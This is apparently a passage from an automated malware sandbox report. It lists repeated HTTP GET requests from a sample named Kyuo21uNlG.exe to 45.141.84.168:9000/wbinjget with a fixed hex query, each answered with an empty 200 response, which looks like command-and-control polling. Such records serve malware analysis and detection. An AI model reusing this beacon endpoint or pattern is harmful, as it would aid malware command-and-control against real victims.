                                          68192.168.2.44992045.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:41:06.575805902 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:41:07.935420990 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:41:07 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          69192.168.2.44992145.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:41:08.169706106 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:41:09.526386976 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:41:09 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          70192.168.2.44992245.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:41:09.748718023 CET87OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Nov 28, 2024 13:41:11.106199026 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:41:10 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          71192.168.2.44992445.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:41:11.563596964 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:41:12.929522991 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:41:11 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          72192.168.2.44992545.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:41:13.155258894 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:41:14.802623034 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:41:14 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          73192.168.2.44992645.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:41:15.029395103 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:41:16.951117992 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:41:16 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          74192.168.2.44992745.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:41:17.185899973 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:41:18.541728973 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:41:18 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          75192.168.2.44992945.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:41:18.765396118 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:41:20.166143894 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:41:19 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          76192.168.2.44993045.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:41:20.389576912 CET87OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Nov 28, 2024 13:41:21.793428898 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:41:21 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          77192.168.2.44993345.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:41:22.249596119 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:41:23.562968969 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:41:23 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          78192.168.2.44993445.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:41:23.795861006 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:41:25.106008053 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:41:24 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          79192.168.2.44993545.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:41:25.347991943 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:41:26.712551117 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:41:26 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          80192.168.2.44993645.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:41:26.936320066 CET87OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Nov 28, 2024 13:41:28.338802099 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:41:27 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          81192.168.2.44993745.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:41:28.579086065 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:41:30.317536116 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:41:29 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          82192.168.2.44993945.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:41:30.547952890 CET87OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Nov 28, 2024 13:41:31.951723099 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:41:30 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          83192.168.2.44994045.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:41:32.213013887 CET87OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Nov 28, 2024 13:41:34.555958986 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:41:34 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          84192.168.2.44994145.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:41:34.781766891 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:41:36.138786077 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:41:35 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          85192.168.2.44994245.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:41:36.377144098 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:41:37.736711979 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:41:37 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          86192.168.2.44994445.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:41:37.969263077 CET87OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Nov 28, 2024 13:41:39.334563017 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:41:39 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          87192.168.2.44994545.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:41:39.561217070 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:41:40.920373917 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:41:40 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          88192.168.2.44994645.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:41:41.160402060 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:41:42.470906019 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:41:41 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          89192.168.2.44994745.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:41:42.702326059 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:41:44.060105085 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:41:43 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          90192.168.2.44994845.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:41:44.296494961 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:41:45.661506891 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:41:45 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          91192.168.2.44994945.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:41:45.890048027 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:41:47.295892954 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:41:47 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          92192.168.2.44995045.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:41:47.536052942 CET87OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Nov 28, 2024 13:41:48.939816952 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:41:48 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          93192.168.2.44995245.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:41:49.180258036 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:41:50.491682053 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:41:50 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          94192.168.2.44995345.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:41:50.721275091 CET87OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Nov 28, 2024 13:41:52.083992958 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:41:51 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          95192.168.2.44995445.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:41:52.322794914 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:41:53.637132883 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:41:53 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          96192.168.2.44995545.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:41:53.876306057 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:41:55.231777906 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:41:55 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          97192.168.2.44995645.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:41:55.468799114 CET87OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Nov 28, 2024 13:41:56.784996986 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:41:56 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          98192.168.2.44995745.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
